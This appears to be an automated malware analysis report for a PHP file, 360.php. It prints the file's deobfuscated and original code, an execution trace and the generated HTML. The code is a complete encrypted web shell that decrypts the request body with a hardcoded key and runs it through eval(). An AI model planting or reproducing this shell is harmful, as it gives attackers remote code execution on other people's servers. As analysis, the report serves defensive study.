PHP Malware Analysis
360.php
md5: 050a8c1dbd653485ef24387285175fe0
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated)
Environment
- error_reporting (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
Input
- php:\/\/input (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
@error_reporting(0);
session_start();
$key = "e45e329feb5d925b";
$_SESSION['k'] = $key;
session_write_close();
$post = file_get_contents("php://input");
if (!extension_loaded('openssl')) {
$t = "base64_decode";
$post = base64_decode($post . "");
for ($i = 0; $i < strlen($post); $i++) {
$post[$i] ^= $key[$i + 1 & 15];
}
} else {
$post = openssl_decrypt($post, "AES128", $key);
}
$arr = explode('|', $post);
$func = $arr[0];
$params = $arr[1];
class C
{
public function __invoke($p)
{
eval($p . "");
}
}
@call_user_func(new C(), $params);Execution traces
data/traces/050a8c1dbd653485ef24387285175fe0_trace-1676241627.4161.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:40:53.313890]
1 0 1 0.000163 393512
1 3 0 0.000256 400136 {main} 1 /var/www/html/uploads/360.php 0 0
2 4 0 0.000274 400136 error_reporting 0 /var/www/html/uploads/360.php 2 1 0
2 4 1 0.000289 400176
2 4 R 0
2 5 0 0.000303 400136 session_start 0 /var/www/html/uploads/360.php 3 0
2 5 1 0.000357 400888
2 5 R TRUE
1 A /var/www/html/uploads/360.php 4 $key = 'e45e329feb5d925b'
1 A /var/www/html/uploads/360.php 5 _SESSION['k'] = 'e45e329feb5d925b'
2 6 0 0.000401 401208 session_write_close 0 /var/www/html/uploads/360.php 6 0
2 6 1 0.000425 401104
2 6 R TRUE
2 7 0 0.000439 401104 file_get_contents 0 /var/www/html/uploads/360.php 7 1 'php://input'
2 7 1 0.000459 401840
2 7 R ''
1 A /var/www/html/uploads/360.php 7 $post = ''
2 8 0 0.000483 401800 extension_loaded 0 /var/www/html/uploads/360.php 8 1 'openssl'
2 8 1 0.000497 401840
2 8 R TRUE
2 9 0 0.000510 401800 openssl_decrypt 0 /var/www/html/uploads/360.php 19 3 '' 'AES128' 'e45e329feb5d925b'
2 9 1 0.000541 401904
2 9 R FALSE
1 A /var/www/html/uploads/360.php 19 $post = FALSE
2 10 0 0.000565 401800 explode 0 /var/www/html/uploads/360.php 21 2 '|' FALSE
2 10 1 0.000579 402248
2 10 R [0 => '']
1 A /var/www/html/uploads/360.php 21 $arr = [0 => '']
1 A /var/www/html/uploads/360.php 22 $func = ''
1 A /var/www/html/uploads/360.php 23 $params = NULL
2 12 0 0.000643 402216 C->__invoke 1 /var/www/html/uploads/360.php 25 1 NULL
2 12 1 0.000658 402248
1 3 1 0.000666 402208
0.000693 316664
TRACE END [2023-02-12 20:40:53.314452]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>